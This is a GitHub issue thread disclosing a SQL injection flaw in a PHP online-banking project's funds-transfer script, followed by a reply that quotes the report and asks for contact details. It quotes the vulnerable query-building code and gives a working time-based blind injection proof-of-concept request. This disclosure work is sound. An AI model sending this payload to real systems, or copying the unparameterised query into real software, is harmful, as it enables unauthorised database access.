Found a vulnerability
Opened this issue · 1 comments
0clickjacking0 commented
Vulnerability file address
net-banking/send_funds_action.php
from line 17,The $_GET['cust_id']
parameter is controllable, the parameter cust_id can be passed through get, and the $receiver_id
is not protected from sql injection, line 29 $result5 = $conn->query($sql5);
made a sql query,resulting in sql injection
......
......
......
if (isset($_GET['cust_id'])) {
$receiver_id = $_GET['cust_id'];
}
$sender_id = $_SESSION['loggedIn_cust_id'];
$amt = mysqli_real_escape_string($conn, $_POST["amt"]);
$password = mysqli_real_escape_string($conn, $_POST["password"]);
$sql0 = "SELECT * FROM customer WHERE cust_id=".$sender_id." AND pwd='".$password."'";
$result0 = $conn->query($sql0);
$row0 = $result0->fetch_assoc();
$sql5 = "SELECT * FROM customer WHERE cust_id=".$receiver_id;
$result5 = $conn->query($sql5);
......
......
......
POC
GET /net-banking/send_funds_action.php?cust_id=666 AND (SELECT 2011 FROM (SELECT(SLEEP(5)))DwUi) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Upgrade-Insecure-Requests: 1
Attack results pictures
saossi903 commented
Please can I have your Facebook contact or WhatsApp or Skype?
…On Mon, Sep 5, 2022, 10:18 0clickjacking0 ***@***.***> wrote:
Vulnerability file address
net-banking/send_funds_action.php from line 17,The $_GET['cust_id']
parameter is controllable, the parameter cust_id can be passed through get,
and the $receiver_id is not protected from sql injection, line 29 $result5
= $conn->query($sql5); made a sql query,resulting in sql injection
..................
if (isset($_GET['cust_id'])) {
$receiver_id = $_GET['cust_id'];
}
$sender_id = $_SESSION['loggedIn_cust_id'];
$amt = mysqli_real_escape_string($conn, $_POST["amt"]);
$password = mysqli_real_escape_string($conn, $_POST["password"]);
$sql0 = "SELECT * FROM customer WHERE cust_id=".$sender_id." AND pwd='".$password."'";
$result0 = $conn->query($sql0);
$row0 = $result0->fetch_assoc();
$sql5 = "SELECT * FROM customer WHERE cust_id=".$receiver_id;
$result5 = $conn->query($sql5);..................
POC
GET /net-banking/send_funds_action.php?cust_id=666 AND (SELECT 2011 FROM (SELECT(SLEEP(5)))DwUi) HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Upgrade-Insecure-Requests: 1
Attack results pictures
[image: image-20220904201949905]
<https://camo.githubusercontent.com/e87e2b01b26d7f5a6f9aad101ade934b4c59f2219d0f57eeade12f5237070cea/68747470733a2f2f7869616e7975313233696d616765732e6f73732d636e2d68616e677a686f752e616c6979756e63732e636f6d2f32303232303930343230313934392e706e67>
—
Reply to this email directly, view it on GitHub
<#19>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/ALVAVO3275W5YFBJESLFPXLV4XCHDANCNFSM6AAAAAAQE3A3I4>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>